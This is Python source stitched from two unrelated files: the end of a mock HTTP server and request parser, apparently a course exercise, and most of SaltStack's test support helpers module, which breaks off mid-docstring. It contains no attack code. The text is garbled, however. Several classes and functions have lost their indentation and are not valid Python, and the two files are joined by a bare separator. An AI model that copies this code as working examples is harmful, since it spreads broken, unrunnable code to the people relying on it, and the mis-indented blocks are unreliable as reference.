                fileapp.get_content(dirPath, requestParser.fileName, requestParser.contentType)
                status = fileapp.status
                content = fileapp.content
        elif requestParser.method == HttpMethod.Post:
            if requestParser.operation == Operation.PostResource:
                logging.debug("Regular post.")
                status = 200
                content = "{\"args\": {},\"data\": \"" + requestParser.fileContent + "\"}"
            else:
                fileapp.post_content(dirPath, requestParser.fileName, requestParser.fileContent, requestParser.contentType)
                status = fileapp.status
                content = fileapp.content
        # Assemble the response per the HTTP/1.1 message format.
        response_msg = 'HTTP/1.1 ' + str(status) + ' ' + self.status_phrase(status) + '\r\n'
        # Content-Length is the BYTE length of the body, not the character
        # count (they differ for non-ASCII content).
        body_bytes = content.encode("utf-8")
        response_msg = response_msg + 'Connection: close\r\n' + 'Content-Length: ' + str(len(body_bytes)) + '\r\n'
        if requestParser.operation == Operation.Download:
            response_msg = response_msg + 'Content-Disposition: attachment; filename="download.txt"\r\n'
        response_msg = response_msg + 'Content-Type: ' + requestParser.contentType + '\r\n\r\n'
        return response_msg.encode("utf-8") + body_bytes

    def status_phrase(self, status):
        """Map the HTTP status codes this server emits to reason phrases."""
        phrase = ''
        if status == 200:
            phrase = 'OK'
        if status == 301:
            phrase = 'Moved Permanently'
        if status == 400:
            phrase = 'Bad Request'
        if status == 404:
            phrase = 'Not Found'
        if status == 505:
            phrase = 'HTTP Version Not Supported'
        return phrase
'''
get 'http://google.ca/'
---------------------------------
GET /? HTTP/1.0
Host:google.ca
get 'http://google.ca/foo'
---------------------------------
GET /foo? HTTP/1.0
Host:google.ca
get -h Content-Type:application/json 'http://google.ca/foo'
'''
'''
post -h Content-Type:application/json -h hk1:hv1 -d '{"": 123abc}' http://httpbin.org/filename
--------------------------------------------------------------------------------------------------
POST /filename HTTP/1.0
Content-Type:application/json
hk1:hv1
Content-Length: 11
Host: httpbin.org
User-Agent: Concordia-HTTP/1.0
Connection: close
{"":123abc}
'''
class HttpRequestParser:
    """Parse a raw HTTP request string into method/operation/attributes.

    Populates: ``method`` (HttpMethod), ``operation`` (Operation),
    ``contentType``, ``getParameter`` (JSON string of the query args for
    /get), ``fileName``/``fileContent`` where applicable, and ``version``.
    """

    def __init__(self, data):
        self.contentType = "application/json"
        # self.contentDisposition = "inline"
        self.getParameter = ""
        # BUG FIX: split only at the FIRST blank line.  A body that itself
        # contained "\r\n\r\n" made the 2-tuple unpack raise ValueError.
        (http_header, http_body) = data.split('\r\n\r\n', 1)
        lines = http_header.split('\r\n')
        (method, resource, version) = lines[0].split(' ')
        for line in lines:
            if("Content-Type" in line):
                # maxsplit=1 keeps values containing ':' intact; strip()
                # tolerates the conventional "Content-Type: value" space.
                self.contentType = line.split(':', 1)[1].strip()
        if(resource.endswith("?")):
            # Normalize a bare trailing '?' (empty query string).
            resource = resource[:-1]
        if(method == HttpMethod.Get):
            self.method = HttpMethod.Get
            if(resource.startswith("/get")):
                # /get, /get?user=a, /get?course=networking&assignment=1
                self.operation = Operation.GetResource
                if(resource == "/get"):
                    self.getParameter = ""
                else:
                    l, r = resource.split('?')
                    output = {}
                    for kv in r.split('&'):
                        k, v = kv.split('=')
                        output[k] = v
                    self.getParameter = json.dumps(output)
            elif(resource == "/download"):
                self.operation = Operation.Download
            elif(resource == "/"):
                self.operation = Operation.GetFileList
            else:
                # Anything else is treated as a file name under the data dir.
                m = re.match(r"/(.+)", resource)
                if(m):
                    self.operation = Operation.GetFileContent
                    self.fileName = m.group(1)
                else:
                    self.operation = Operation.Invalid
        elif(method == HttpMethod.Post):
            self.method = HttpMethod.Post
            m = re.match(r"/(.+)", resource)
            if(m):
                self.fileContent = http_body
                if(m.group(1) == "post"):
                    # httpbin-style echo endpoint.
                    self.operation = Operation.PostResource
                else:
                    self.operation = Operation.WriteFileContent
                    self.fileName = m.group(1)
            else:
                self.operation = Operation.Invalid
        else:
            self.method = HttpMethod.Invalid
        self.version = version
        self.contentDisposition = None  # TODO
        self.overwrite = False  # TODO
# String constants tagging the parsed request method; compared against the
# raw method token from the request line in HttpRequestParser.
class HttpMethod:
Invalid = "Invalid"
Get = "GET"
Post = "POST"
# Integer codes describing what a parsed request asks the server to do;
# consumed by MockHttpServer.generateResponse.
class Operation:
Invalid = 0
GetFileList = 1
GetFileContent = 2
WriteFileContent = 3
GetResource = 4
PostResource = 5
Download = 6
|
helpers.py | # -*- coding: utf-8 -*-
'''
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
'''
# pylint: disable=repr-flag-used-in-string,wrong-import-order
# Import Python libs
from __future__ import absolute_import
import base64
import errno
import functools
import inspect
import logging
import os
import random
import signal
import socket
import string
import sys
import threading
import time
import tornado.ioloop
import tornado.web
import types
# Import 3rd-party libs
import psutil # pylint: disable=3rd-party-module-not-gated
import salt.ext.six as six
from salt.ext.six.moves import range, builtins # pylint: disable=import-error,redefined-builtin
# Prefer the pytest-salt implementation; fall back to a local helper that
# asks the OS for an ephemeral port when pytestsalt is not installed.
try:
from pytestsalt.utils import get_unused_localhost_port # pylint: disable=unused-import
except ImportError:
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
# Bind to port 0 so the kernel picks a free port, read it back, then
# release the socket.  NOTE(review): the port is only *likely* free —
# another process may grab it between close() and the caller's bind.
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
usock.close()
return port
# Import Salt Tests Support libs
from tests.support.unit import skip, _id
from tests.support.mock import patch
from tests.support.paths import FILES
log = logging.getLogger(__name__)
def destructiveTest(caller):
    '''
    Mark a test case as a destructive test for example adding or removing users
    from your system.

    Works on both test classes (chains a skipping ``setUp``) and individual
    test methods (wraps them).  The ``DESTRUCTIVE_TESTS`` environment
    variable is read at call time, so it may be changed after import.

    .. code-block:: python

        class MyTestCase(TestCase):

            @destructiveTest
            def test_create_user(self):
                pass
    '''
    def _skip_if_disabled(test_obj):
        # skipTest raises, so nothing after this call runs when disabled.
        if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
            test_obj.skipTest('Destructive tests are disabled')

    if inspect.isclass(caller):
        # Decorating a class: prepend the skip check to its setUp.
        previous_setup = getattr(caller, 'setUp', None)

        def setUp(self, *args, **kwargs):
            _skip_if_disabled(self)
            if previous_setup is not None:
                previous_setup(self, *args, **kwargs)

        caller.setUp = setUp
        return caller

    # Decorating a plain test function/method.
    @functools.wraps(caller)
    def wrap(cls):
        _skip_if_disabled(cls)
        return caller(cls)
    return wrap
def expensiveTest(caller):
    '''
    Mark a test case as an expensive test, for example, a test which can cost
    money(Salt's cloud provider tests).

    Works on both test classes (chains a skipping ``setUp``) and individual
    test methods (wraps them).  The ``EXPENSIVE_TESTS`` environment variable
    is read at call time, so it may be changed after import.

    .. code-block:: python

        class MyTestCase(TestCase):

            @expensiveTest
            def test_create_user(self):
                pass
    '''
    def _skip_if_disabled(test_obj):
        # skipTest raises, so nothing after this call runs when disabled.
        if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
            test_obj.skipTest('Expensive tests are disabled')

    if inspect.isclass(caller):
        # Decorating a class: prepend the skip check to its setUp.
        previous_setup = getattr(caller, 'setUp', None)

        def setUp(self, *args, **kwargs):
            _skip_if_disabled(self)
            if previous_setup is not None:
                previous_setup(self, *args, **kwargs)

        caller.setUp = setUp
        return caller

    # Decorating a plain test function/method.
    @functools.wraps(caller)
    def wrap(cls):
        _skip_if_disabled(cls)
        return caller(cls)
    return wrap
def flaky(caller=None, condition=True):
    '''
    Mark a test as flaky. The test will attempt to run five times,
    looking for a successful run. After an immediate second try,
    it will use an exponential backoff starting with one second.

    ``condition`` may be a bool or a callable; when it evaluates to False
    the test is left undecorated.

    .. code-block:: python

        class MyTestCase(TestCase):

            @flaky
            def test_sometimes_works(self):
                pass
    '''
    if caller is None:
        # Used as @flaky(condition=...) -- return the actual decorator.
        return functools.partial(flaky, condition=condition)

    if isinstance(condition, bool) and condition is False:
        # Don't even decorate
        return caller
    elif callable(condition):
        if condition() is False:
            # Don't even decorate
            return caller

    if inspect.isclass(caller):
        # Decorating a class: wrap every test_* method individually.
        attrs = [n for n in dir(caller) if n.startswith('test_')]
        for attrname in attrs:
            try:
                function = getattr(caller, attrname)
                if not inspect.isfunction(function) and not inspect.ismethod(function):
                    continue
                setattr(caller, attrname, flaky(caller=function, condition=condition))
            except Exception as exc:
                log.exception(exc)
                continue
        return caller

    @functools.wraps(caller)
    def wrap(cls):
        # Five attempts (indices 0-4), per the docstring.
        # BUG FIX: the loop previously ran `range(0, 4)` while checking
        # `attempt == 4`, so the re-raise was unreachable and a test that
        # failed on every attempt silently "passed" by falling through.
        for attempt in range(5):
            try:
                return caller(cls)
            except Exception as exc:
                if attempt == 4:
                    # Out of retries -- surface the last failure.
                    raise exc
                backoff_time = attempt ** 2  # 0s, 1s, 4s, 9s
                log.info('Found Exception. Waiting %s seconds to retry.', backoff_time)
                time.sleep(backoff_time)
    return wrap
def requires_sshd_server(caller):
    '''
    Mark a test as requiring the tests SSH daemon running.

    Works on both test classes (chains a skipping ``setUp``) and individual
    test methods (wraps them).  The ``SSH_DAEMON_RUNNING`` environment
    variable is read at call time, so it may be changed after import.

    .. code-block:: python

        class MyTestCase(TestCase):

            @requiresSshdServer
            def test_create_user(self):
                pass
    '''
    def _skip_if_disabled(test_obj):
        # skipTest raises, so nothing after this call runs when disabled.
        if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
            test_obj.skipTest('SSH tests are disabled')

    if inspect.isclass(caller):
        # Decorating a class: prepend the skip check to its setUp.
        previous_setup = getattr(caller, 'setUp', None)

        def setUp(self, *args, **kwargs):
            _skip_if_disabled(self)
            if previous_setup is not None:
                previous_setup(self, *args, **kwargs)

        caller.setUp = setUp
        return caller

    # Decorating a plain test function/method.
    @functools.wraps(caller)
    def wrap(cls):
        _skip_if_disabled(cls)
        return caller(cls)
    return wrap
class RedirectStdStreams(object):
'''
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
'''
# Target streams default to devnull; sys.stdout/sys.stderr are swapped via
# mock's patch.multiple so they are restored exactly on unredirect().
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils
if stdout is None:
stdout = salt.utils.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
if stderr is None:
stderr = salt.utils.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
# Flush the real streams before patching so buffered output is not lost.
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
# Flush and close the replacement streams, then restore the originals.
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
# Best-effort flush of the replacement streams while redirected.
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception:
pass
try:
self.__stderr.flush()
except Exception:
pass
class TestsLoggingHandler(object):
'''
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TestsLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
'''
# NOTE: mutates the process-global root logger (handler list and level)
# between activate() and deactivate(); not safe for parallel use.
def __init__(self, level=0, format='%(levelname)s:%(message)s'):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
# Install a capturing handler on the root logger and force level 0 so
# every record reaches it; remembers the previous level for restore.
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
# self.format here is logging.Handler.format (applies the
# formatter set below), not the constructor's format string.
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
# Remove the capturing handler and restore the saved root level.
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
# Formatted records captured so far (empty before activation).
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
def relative_import(import_name, relative_from='../'):
    '''
    Update sys.path to include `relative_from` before importing `import_name`

    The plain import is attempted first; only on ImportError is the path
    (resolved relative to the *caller's* file) prepended and the import
    retried.
    '''
    try:
        return __import__(import_name)
    except ImportError:
        # Locate the file of the frame that called us.
        caller_frame = inspect.getframeinfo(inspect.currentframe().f_back)
        caller_dir = os.path.abspath(os.path.dirname(caller_frame.filename))
        # Resolve `relative_from` against that directory and put it first
        # on the module search path.
        search_path = os.path.realpath(os.path.join(caller_dir, relative_from))
        sys.path.insert(0, search_path)
        return __import__(import_name)
class ForceImportErrorOn(object):
    '''
    This class is meant to be used in mock'ed test cases which require an
    ``ImportError`` to be raised.

    >>> import os.path
    >>> with ForceImportErrorOn('os.path'):
    ...     import os.path
    ...
    Traceback (most recent call last):
      File "<stdin>", line 2, in <module>
      File "salttesting/helpers.py", line 263, in __import__
        'Forced ImportError raised for {0!r}'.format(name)
    ImportError: Forced ImportError raised for 'os.path'
    >>>

    >>> with ForceImportErrorOn(('os', 'path')):
    ...     import os.path
    ...     sys.modules.pop('os', None)
    ...     from os import path
    ...
    <module 'os' from '/usr/lib/python2.7/os.pyc'>
    Traceback (most recent call last):
      File "<stdin>", line 4, in <module>
      File "salttesting/helpers.py", line 288, in __fake_import__
        name, ', '.join(fromlist)
    ImportError: Forced ImportError raised for 'from os import path'
    >>>

    >>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
    ...     import os.path
    ...     sys.modules.pop('os', None)
    ...     from os import path
    ...
    Traceback (most recent call last):
      File "<stdin>", line 2, in <module>
      File "salttesting/helpers.py", line 281, in __fake_import__
        'Forced ImportError raised for {0!r}'.format(name)
    ImportError: Forced ImportError raised for 'os.path'
    >>>
    '''
    def __init__(self, *module_names):
        # Map module name -> None (fail any import of it) or a set of
        # from-list names that should fail.
        self.__module_names = {}
        for entry in module_names:
            if isinstance(entry, (list, tuple)):
                modname = entry[0]
                self.__module_names[modname] = set(entry[1:])
            else:
                self.__module_names[entry] = None
        # BUG FIX: keep a reference to the real __import__ BEFORE patching.
        # __fake_import__ delegates to it for non-forced names, but
        # self.__original_import was never assigned, so ANY unmatched import
        # inside the context raised AttributeError instead of importing.
        self.__original_import = builtins.__import__
        self.patcher = patch.object(builtins, '__import__', self.__fake_import__)

    def patch_import_function(self):
        self.patcher.start()

    def restore_import_funtion(self):
        # (Historic typo in the method name is kept for API compatibility.)
        self.patcher.stop()

    def __fake_import__(self, name, globals_, locals_, fromlist, level=-1):
        # `level=-1` default is a Python 2 relic; Python 3 always passes an
        # explicit level, so the default is never used there.
        if name in self.__module_names:
            importerror_fromlist = self.__module_names.get(name)
            if importerror_fromlist is None:
                raise ImportError(
                    'Forced ImportError raised for {0!r}'.format(name)
                )
            if importerror_fromlist.intersection(set(fromlist)):
                raise ImportError(
                    'Forced ImportError raised for {0!r}'.format(
                        'from {0} import {1}'.format(
                            name, ', '.join(fromlist)
                        )
                    )
                )
        # Not a forced failure -- delegate to the real import machinery.
        return self.__original_import(name, globals_, locals_, fromlist, level)

    def __enter__(self):
        self.patch_import_function()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.restore_import_funtion()
class MockWraps(object):
    '''
    Helper class to be used with the mock library.

    Pass an instance as the ``wraps`` keyword of ``Mock`` or ``MagicMock``
    when a side effect should fire for the first N calls and the original,
    un-mocked callable should take over afterwards.

    >>> mw = MockWraps(original, 2, side_effect)
    >>> mw()   # side effect
    >>> mw()   # side effect
    >>> mw()   # original
    '''
    def __init__(self, original, expected_failures, side_effect):
        self.__original = original
        self.__expected_failures = expected_failures
        self.__side_effect = side_effect
        self.__call_counter = 0

    def __call__(self, *args, **kwargs):
        # Record this call up-front so the counter advances even when the
        # side effect (or the original) raises.
        call_number = self.__call_counter
        self.__call_counter += 1
        if call_number < self.__expected_failures:
            # A plain function side effect is invoked; anything else
            # (typically an exception instance) is raised.
            if isinstance(self.__side_effect, types.FunctionType):
                return self.__side_effect()
            raise self.__side_effect
        return self.__original(*args, **kwargs)
def requires_network(only_local_network=False):
    '''
    Simple decorator which is supposed to skip a test case in case there's no
    network connection to the internet.
    '''
    def decorator(func):
        @functools.wraps(func)
        def wrapper(cls):
            has_local_network = False
            # First lets try if we have a local network. Inspired in
            # verify_socket
            try:
                # Successfully binding both throw-away ports proves a usable
                # IPv4 network stack.
                pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                pubsock.bind(('', 18000))
                pubsock.close()
                retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                retsock.bind(('', 18001))
                retsock.close()
                has_local_network = True
            except socket.error:
                # I wonder if we just have IPV6 support?
                try:
                    pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                    retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                    pubsock.setsockopt(
                        socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
                    )
                    pubsock.bind(('', 18000))
                    pubsock.close()
                    retsock.setsockopt(
                        socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
                    )
                    retsock.bind(('', 18001))
                    retsock.close()
                    has_local_network = True
                except socket.error:
                    # Let's continue
                    pass

            if only_local_network is True:
                if has_local_network is False:
                    # Since we're only supposed to check local network, and no
                    # local network was detected, skip the test
                    cls.skipTest('No local network was detected')
                return func(cls)

            # We are using the google.com DNS records as numerical IPs to avoid
            # DNS lookups which could greatly slow down this check
            for addr in ('173.194.41.198', '173.194.41.199', '173.194.41.200',
                         '173.194.41.201', '173.194.41.206', '173.194.41.192',
                         '173.194.41.193', '173.194.41.194', '173.194.41.195',
                         '173.194.41.196', '173.194.41.197'):
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                try:
                    sock.settimeout(0.25)
                    sock.connect((addr, 80))
                    # We connected? Stop the loop
                    break
                except socket.error:
                    # Let's check the next IP
                    continue
                # NOTE(review): this ``else`` clause is unreachable — the try
                # body always ends in ``break`` — so the skip below never
                # fires; confirm whether it was meant to be the for-loop's
                # ``else``.
                else:
                    cls.skipTest('No internet network connection was detected')
                finally:
                    sock.close()
            return func(cls)
        return wrapper
    return decorator
def with_system_user(username, on_existing='delete', delete=True):
    '''
    Create and optionally destroy a system user to be used within a test
    case. The system user is crated using the ``user`` salt module.

    The decorated testcase function must accept 'username' as an argument.

    :param username: The desired username for the system user.
    :param on_existing: What to do when the desired username is taken. The
                        available options are:

                        * nothing: Do nothing, act as if the user was created.
                        * delete: delete and re-create the existing user
                        * skip: skip the test case
    '''
    if on_existing not in ('nothing', 'delete', 'skip'):
        raise RuntimeError(
            'The value of \'on_existing\' can only be one of, '
            '\'nothing\', \'delete\' and \'skip\''
        )

    if not isinstance(delete, bool):
        raise RuntimeError(
            'The value of \'delete\' can only be \'True\' or \'False\''
        )

    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug('Creating system user {0!r}'.format(username))
            create_user = cls.run_function('user.add', [username])
            if not create_user:
                log.debug('Failed to create system user')
                # The user was not created
                # (on_existing == 'nothing' deliberately falls through here)
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system user {0!r}'.format(
                            username
                        )
                    )

                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system user {0!r}'.format(
                            username
                        )
                    )
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    if not delete_user:
                        cls.skipTest(
                            'A user named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(username)
                        )
                    log.debug(
                        'Second time creating system user {0!r}'.format(
                            username
                        )
                    )
                    create_user = cls.run_function('user.add', [username])
                    if not create_user:
                        cls.skipTest(
                            'A user named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(username)
                        )

            failure = None
            try:
                try:
                    return func(cls, username)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        'Running {0!r} raised an exception: {1}'.format(
                            func, exc
                        ),
                        exc_info=True
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                if delete:
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    if not delete_user:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system user {0!r} '
                                'afterwards did.'.format(username)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system user {0!r}'.format(username)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    six.reraise(failure[0], failure[1], failure[2])
        return wrap
    return decorator
def with_system_group(group, on_existing='delete', delete=True):
    '''
    Create and optionally destroy a system group to be used within a test
    case. The system user is crated using the ``group`` salt module.

    The decorated testcase function must accept 'group' as an argument.

    :param group: The desired group name for the system user.
    :param on_existing: What to do when the desired username is taken. The
                        available options are:

                        * nothing: Do nothing, act as if the group was created
                        * delete: delete and re-create the existing user
                        * skip: skip the test case
    '''
    if on_existing not in ('nothing', 'delete', 'skip'):
        raise RuntimeError(
            'The value of \'on_existing\' can only be one of, '
            '\'nothing\', \'delete\' and \'skip\''
        )

    if not isinstance(delete, bool):
        raise RuntimeError(
            'The value of \'delete\' can only be \'True\' or \'False\''
        )

    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug('Creating system group {0!r}'.format(group))
            create_group = cls.run_function('group.add', [group])
            if not create_group:
                log.debug('Failed to create system group')
                # The group was not created
                # (on_existing == 'nothing' deliberately falls through here)
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system group {0!r}'.format(group)
                    )

                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system group {0!r}'.format(group)
                    )
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_group:
                        cls.skipTest(
                            'A group named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(group)
                        )
                    log.debug(
                        'Second time creating system group {0!r}'.format(
                            group
                        )
                    )
                    create_group = cls.run_function('group.add', [group])
                    if not create_group:
                        cls.skipTest(
                            'A group named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(group)
                        )

            failure = None
            try:
                try:
                    return func(cls, group)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        'Running {0!r} raised an exception: {1}'.format(
                            func, exc
                        ),
                        exc_info=True
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                if delete:
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_group:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system group {0!r} '
                                'afterwards did.'.format(group)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system group {0!r}'.format(group)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    six.reraise(failure[0], failure[1], failure[2])
        return wrap
    return decorator
def with_system_user_and_group(username, group,
                               on_existing='delete', delete=True):
    '''
    Create and optionally destroy a system user and group to be used within a
    test case. The system user is crated using the ``user`` salt module, and
    the system group is created with the ``group`` salt module.

    The decorated testcase function must accept both the 'username' and 'group'
    arguments.

    :param username: The desired username for the system user.
    :param group: The desired name for the system group.
    :param on_existing: What to do when the desired username is taken. The
                        available options are:

                        * nothing: Do nothing, act as if the user was created.
                        * delete: delete and re-create the existing user
                        * skip: skip the test case
    '''
    if on_existing not in ('nothing', 'delete', 'skip'):
        raise RuntimeError(
            'The value of \'on_existing\' can only be one of, '
            '\'nothing\', \'delete\' and \'skip\''
        )

    if not isinstance(delete, bool):
        raise RuntimeError(
            'The value of \'delete\' can only be \'True\' or \'False\''
        )

    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug('Creating system user {0!r}'.format(username))
            create_user = cls.run_function('user.add', [username])
            log.debug('Creating system group {0!r}'.format(group))
            create_group = cls.run_function('group.add', [group])
            if not create_user:
                log.debug('Failed to create system user')
                # The user was not created
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system user {0!r}'.format(
                            username
                        )
                    )

                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system user {0!r}'.format(
                            username
                        )
                    )
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    if not delete_user:
                        cls.skipTest(
                            'A user named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(username)
                        )
                    log.debug(
                        'Second time creating system user {0!r}'.format(
                            username
                        )
                    )
                    create_user = cls.run_function('user.add', [username])
                    if not create_user:
                        cls.skipTest(
                            'A user named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(username)
                        )
            if not create_group:
                log.debug('Failed to create system group')
                # The group was not created
                if on_existing == 'skip':
                    cls.skipTest(
                        'Failed to create system group {0!r}'.format(group)
                    )

                if on_existing == 'delete':
                    log.debug(
                        'Deleting the system group {0!r}'.format(group)
                    )
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_group:
                        cls.skipTest(
                            'A group named {0!r} already existed on the '
                            'system and re-creating it was not possible'
                            .format(group)
                        )
                    log.debug(
                        'Second time creating system group {0!r}'.format(
                            group
                        )
                    )
                    create_group = cls.run_function('group.add', [group])
                    if not create_group:
                        cls.skipTest(
                            'A group named {0!r} already existed, was deleted '
                            'as requested, but re-creating it was not possible'
                            .format(group)
                        )

            failure = None
            try:
                try:
                    return func(cls, username, group)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        'Running {0!r} raised an exception: {1}'.format(
                            func, exc
                        ),
                        exc_info=True
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                if delete:
                    # Always attempt both removals so a failed user delete
                    # does not leave the group behind.
                    delete_user = cls.run_function(
                        'user.delete', [username, True, True]
                    )
                    delete_group = cls.run_function('group.delete', [group])
                    if not delete_user:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system user {0!r} '
                                'afterwards did.'.format(username)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system user {0!r}'.format(username)
                            )
                    if not delete_group:
                        if failure is None:
                            log.warning(
                                'Although the actual test-case did not fail, '
                                'deleting the created system group {0!r} '
                                'afterwards did.'.format(group)
                            )
                        else:
                            log.warning(
                                'The test-case failed and also did the removal'
                                ' of the system group {0!r}'.format(group)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    six.reraise(failure[0], failure[1], failure[2])
        return wrap
    return decorator
def requires_system_grains(func):
    '''
    Function decorator which loads and passes the system's grains to the test
    case.
    '''
    @functools.wraps(func)
    def decorator(cls):
        # The test class must expose ``run_function`` so the grains can be
        # collected from the running minion.
        if hasattr(cls, 'run_function'):
            return func(cls, grains=cls.run_function('grains.items'))
        raise RuntimeError(
            '{0} does not have the \'run_function\' method which is '
            'necessary to collect the system grains'.format(
                cls.__class__.__name__
            )
        )
    return decorator
def requires_salt_modules(*names):
    '''
    Makes sure the passed salt module is available. Skips the test if not

    .. versionadded:: 0.5.2
    '''
    def decorator(caller):
        if inspect.isclass(caller):
            # We're decorating a class
            old_setup = getattr(caller, 'setUp', None)

            def setUp(self, *args, **kwargs):
                if old_setup is not None:
                    old_setup(self, *args, **kwargs)

                if not hasattr(self, 'run_function'):
                    raise RuntimeError(
                        '{0} does not have the \'run_function\' method which '
                        'is necessary to collect the loaded modules'.format(
                            self.__class__.__name__
                        )
                    )

                # NOTE(review): the class path checks availability through
                # runtests_helpers.modules_available while the function path
                # below greps 'sys.doc' — confirm whether both should use the
                # same mechanism.
                not_found_modules = self.run_function('runtests_helpers.modules_available', names)
                if not_found_modules:
                    if len(not_found_modules) == 1:
                        self.skipTest('Salt module {0!r} is not available'.format(not_found_modules[0]))
                    self.skipTest('Salt modules not available: {0!r}'.format(not_found_modules))
            caller.setUp = setUp
            return caller

        # We're simply decorating functions
        @functools.wraps(caller)
        def wrapper(cls):
            if not hasattr(cls, 'run_function'):
                raise RuntimeError(
                    '{0} does not have the \'run_function\' method which is '
                    'necessary to collect the loaded modules'.format(
                        cls.__class__.__name__
                    )
                )

            # Skip on the first missing module name.
            for name in names:
                if name not in cls.run_function('sys.doc'):
                    cls.skipTest(
                        'Salt module {0!r} is not available'.format(name)
                    )
                    break
            return caller(cls)
        return wrapper
    return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
    '''
    Skip the test case unless the required system binaries are installed.

    With ``check_all=True`` every binary must be present; otherwise at least
    one of them must be found. ``message`` is prepended to the skip reason.
